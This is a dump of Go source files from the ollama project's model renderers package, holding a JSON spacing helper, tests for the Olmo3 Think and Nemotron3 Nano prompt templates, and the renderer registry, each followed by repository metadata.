https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/json.go
model/renderers/json.go
package renderers import "encoding/json" // marshalWithSpaces marshals v to JSON and adds a space after each ':' and ',' // that appears outside of string values. This matches the formatting expected // by certain model architectures. func marshalWithSpaces(v any) ([]byte, error) { b, err := json.Marshal(v) if err != nil { return nil, err } out := make([]byte, 0, len(b)+len(b)/8) inStr, esc := false, false for _, c := range b { if inStr { out = append(out, c) if esc { esc = false continue } if c == '\\' { esc = true continue } if c == '"' { inStr = false } continue } switch c { case '"': inStr = true out = append(out, c) case ':': out = append(out, ':', ' ') case ',': out = append(out, ',', ' ') default: out = append(out, c) } } return out, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/olmo3_think_test.go
model/renderers/olmo3_think_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestOlmo3ThinkRenderer(t *testing.T) { tests := []struct { name string variant Olmo3ThinkVariant msgs []api.Message tools []api.Tool expected string }{ { name: "7b_basic_without_system", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "7b_with_custom_system", variant: Olmo31Think, msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant. You do not currently have access to any functions. <functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "7b_tools_ignored", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "What is the weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", }, }, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. 
Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "What is the weather?<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "7b_tool_calls_and_tool_messages_ignored", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "What is the weather in SF?"}, { Role: "assistant", Content: "Let me check the weather.", ToolCalls: []api.ToolCall{ { ID: "call_1", Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"location": "San Francisco"}), }, }, }, }, {Role: "tool", Content: `{"temperature": 68}`}, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "What is the weather in SF?<|im_end|>\n" + "<|im_start|>assistant\n" + "Let me check the weather.<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "7b_multi_turn_conversation", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, {Role: "user", Content: "How are you?"}, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. 
Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "Hello<|im_end|>\n" + "<|im_start|>assistant\n" + "Hi there!<|im_end|>\n" + "<|im_start|>user\n" + "How are you?<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "32b_basic_without_system", variant: Olmo3Think32B, msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful AI assistant.<|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "32b_with_custom_system_gets_suffix", variant: Olmo3Think32B, msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant. You do not currently have access to any functions. <functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "31_basic_without_system", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "31_with_custom_system_gets_suffix", variant: Olmo31Think, msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant. You do not currently have access to any functions. 
<functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Olmo3ThinkRenderer{Variant: tt.variant}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/nemotron3nano_test.go
model/renderers/nemotron3nano_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestNemotron3NanoRenderer(t *testing.T) { tests := []struct { name string msgs []api.Message tools []api.Tool thinkValue *api.ThinkValue expected string }{ { name: "basic user message - thinking mode", msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHello!<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "basic user message - no thinking", msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, thinkValue: nil, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHello!<|im_end|>\n" + "<|im_start|>assistant\n<think></think>", }, { name: "with system message", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\nYou are a helpful assistant.<|im_end|>\n" + "<|im_start|>user\nHello!<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "multi-turn conversation", msgs: []api.Message{ {Role: "user", Content: "Hi"}, {Role: "assistant", Content: "Hello! How can I help?"}, {Role: "user", Content: "Tell me a joke"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHi<|im_end|>\n" + "<|im_start|>assistant\n<think></think>Hello! 
How can I help?<|im_end|>\n" + "<|im_start|>user\nTell me a joke<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "with tools", msgs: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"city"}, Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "The city name"}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_weather</name>\n" + "<description>Get the current weather</description>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n<description>The city name</description>\n</parameter>\n" + "<required>[\"city\"]</required>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWhat's the weather in Paris?<|im_end|>\n" + 
"<|im_start|>assistant\n<think>\n", }, { name: "tool call with response", msgs: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny, 72F"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"city"}, Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "The city name"}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_weather</name>\n" + "<description>Get the current weather</description>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n<description>The city name</description>\n</parameter>\n" + "<required>[\"city\"]</required>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge 
and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWhat's the weather in Paris?<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nSunny, 72F\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "assistant with content and tool call", msgs: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", Content: "Let me check that for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_weather</name>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning 
for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWhat's the weather?<|im_end|>\n" + "<|im_start|>assistant\n<think></think>Let me check that for you.\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nSunny\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "thinking in history is truncated", msgs: []api.Message{ {Role: "user", Content: "Hi"}, {Role: "assistant", Content: "Hello!", Thinking: "Let me think about this..."}, {Role: "user", Content: "How are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHi<|im_end|>\n" + "<|im_start|>assistant\n<think></think>Hello!<|im_end|>\n" + "<|im_start|>user\nHow are you?<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "parallel tool calls", msgs: []api.Message{ {Role: "user", Content: "Weather in Paris and London?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "London"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, {Role: "tool", Content: "Rainy"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + 
"<function>\n<name>get_weather</name>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWeather in Paris and London?<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nLondon\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nSunny\n</tool_response>\n<tool_response>\nRainy\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "thinking disabled when user doesn't request it", msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, thinkValue: nil, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHello!<|im_end|>\n" + "<|im_start|>assistant\n<think></think>", }, { name: "complex message history with thinking, tools, tool calls, tool results and content", msgs: []api.Message{ {Role: "user", Content: "What's the weather in 
Paris and London? Also, what's 2+2?"}, {Role: "assistant", Content: "", Thinking: "I need to check the weather for both cities and calculate 2+2. Let me start with the weather calls.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"})}}, {Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "London"})}}, }}, {Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call1"}, {Role: "tool", Content: "Rainy, 15°C", ToolCallID: "call2"}, {Role: "assistant", Content: "", Thinking: "Now I have the weather data. Let me calculate 2+2.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "calculate", Arguments: testArgs(map[string]any{"expression": "2+2"})}}, }}, {Role: "tool", Content: "4", ToolCallID: "call3"}, {Role: "assistant", Content: "Based on the weather data, Paris is sunny at 22°C and London is rainy at 15°C. Also, 2+2 equals 4.", Thinking: "Perfect! I have all the information needed to provide a complete answer."}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}}, }), }, }, }, { Type: "function", Function: api.ToolFunction{ Name: "calculate", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "expression": {Type: api.PropertyType{"string"}}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_weather</name>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n" + "<function>\n<name>calculate</name>\n" + "<parameters>\n" + 
"<parameter>\n<name>expression</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWhat's the weather in Paris and London? Also, what's 2+2?<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>\nI need to check the weather for both cities and calculate 2+2. Let me start with the weather calls.\n</think>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nLondon\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nSunny, 22°C\n</tool_response>\n<tool_response>\nRainy, 15°C\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>\nNow I have the weather data. Let me calculate 2+2.\n</think>\n" + "<tool_call>\n<function=calculate>\n<parameter=expression>\n2+2\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\n4\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>\nPerfect! 
I have all the information needed to provide a complete answer.\n</think>\n" + "Based on the weather data, Paris is sunny at 22°C and London is rainy at 15°C. Also, 2+2 equals 4.<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "empty messages list", msgs: []api.Message{}, thinkValue: nil, expected: "<|im_start|>system\n<|im_end|>\n<|im_start|>assistant\n<think></think>", }, { name: "tool result with JSON content", msgs: []api.Message{ {Role: "user", Content: "Get user info"}, { Role: "assistant", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get_user", Arguments: testArgs(map[string]any{"id": "123"})}}, }, }, {Role: "tool", Content: `{"name": "John", "age": 30, "active": true}`}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_user", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{"id": {Type: api.PropertyType{"string"}}}), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_user</name>\n<parameters>\n" + "<parameter>\n<name>id</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT 
after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nGet user info<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=get_user>\n<parameter=id>\n123\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\n{\"name\": \"John\", \"age\": 30, \"active\": true}\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "assistant message with only thinking no content", msgs: []api.Message{ {Role: "user", Content: "Think about this"}, {Role: "assistant", Thinking: "Deep thoughts here...", Content: ""}, {Role: "user", Content: "What did you think?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nThink about this<|im_end|>\n" + "<|im_start|>assistant\n<think></think><|im_end|>\n" + "<|im_start|>user\nWhat did you think?<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "tool call with complex nested argument", msgs: []api.Message{ {Role: "user", Content: "Create data"}, { Role: "assistant", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{ Name: "create", Arguments: testArgs(map[string]any{ "data": map[string]any{"nested": "value", "count": 42}, }), }}, }, }, {Role: "tool", Content: "Created"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "create", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{"data": {Type: api.PropertyType{"object"}}}), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>create</name>\n<parameters>\n" + "<parameter>\n<name>data</name>\n<type>object</type>\n</parameter>\n" + 
"</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nCreate data<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=create>\n<parameter=data>\n{\"count\":42,\"nested\":\"value\"}\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nCreated\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "content explaining the format itself", msgs: []api.Message{ {Role: "user", Content: "How do I format a tool call?"}, {Role: "assistant", Content: "To call a tool, use <tool_call> tags with <function=name> inside."}, {Role: "user", Content: "Thanks!"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHow do I format a tool call?<|im_end|>\n" + "<|im_start|>assistant\n<think></think>To call a tool, use <tool_call> tags with <function=name> inside.<|im_end|>\n" + "<|im_start|>user\nThanks!<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "unicode in content and tool args", msgs: []api.Message{ {Role: "user", Content: 
"Translate 你好"}, { Role: "assistant", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "translate", Arguments: testArgs(map[string]any{"text": "你好"})}}, }, }, {Role: "tool", Content: "Hello"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "translate", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "text": {Type: api.PropertyType{"string"}}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>translate</name>\n<parameters>\n" + "<parameter>\n<name>text</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nTranslate 你好<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=translate>\n<parameter=text>\n你好\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nHello\n</tool_response>\n<|im_end|>\n" + 
"<|im_start|>assistant\n<think>\n", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { renderer := &Nemotron3NanoRenderer{} rendered, err := renderer.Render(tt.msgs, tt.tools, tt.thinkValue) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/renderer.go
model/renderers/renderer.go
package renderers import ( "fmt" "github.com/ollama/ollama/api" ) type Renderer interface { Render(messages []api.Message, tools []api.Tool, think *api.ThinkValue) (string, error) } type ( RendererConstructor func() Renderer RendererRegistry struct { renderers map[string]RendererConstructor } ) // RenderImgTags is a global flag that tells renderers to use [img] tags // for images. This is set by the Ollama server package on init, or left as // false for other environments where renderers are used var RenderImgTags bool func (r *RendererRegistry) Register(name string, renderer RendererConstructor) { r.renderers[name] = renderer } var registry = RendererRegistry{ renderers: make(map[string]RendererConstructor), } func Register(name string, renderer RendererConstructor) { registry.Register(name, renderer) } func RenderWithRenderer(name string, msgs []api.Message, tools []api.Tool, think *api.ThinkValue) (string, error) { renderer := rendererForName(name) if renderer == nil { return "", fmt.Errorf("unknown renderer %q", name) } return renderer.Render(msgs, tools, think) } func rendererForName(name string) Renderer { if constructor, ok := registry.renderers[name]; ok { return constructor() } switch name { case "qwen3-coder": renderer := &Qwen3CoderRenderer{} return renderer case "qwen3-vl-instruct": renderer := &Qwen3VLRenderer{isThinking: false, useImgTags: RenderImgTags} return renderer case "qwen3-vl-thinking": renderer := &Qwen3VLRenderer{isThinking: true, useImgTags: RenderImgTags} return renderer case "cogito": renderer := &CogitoRenderer{isThinking: true} return renderer case "deepseek3.1": renderer := &DeepSeek3Renderer{IsThinking: true, Variant: Deepseek31} return renderer case "olmo3": renderer := &Olmo3Renderer{UseExtendedSystemMessage: false} return renderer case "olmo3.1": renderer := &Olmo3Renderer{UseExtendedSystemMessage: true} return renderer case "olmo3-think": // Used for Olmo-3-7B-Think and Olmo-3.1-32B-Think (same template) renderer := 
&Olmo3ThinkRenderer{Variant: Olmo31Think} return renderer case "olmo3-32b-think": // Used for Olmo-3-32B-Think renderer := &Olmo3ThinkRenderer{Variant: Olmo3Think32B} return renderer case "nemotron-3-nano": return &Nemotron3NanoRenderer{} case "functiongemma": return &FunctionGemmaRenderer{} default: return nil } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/json_test.go
model/renderers/json_test.go
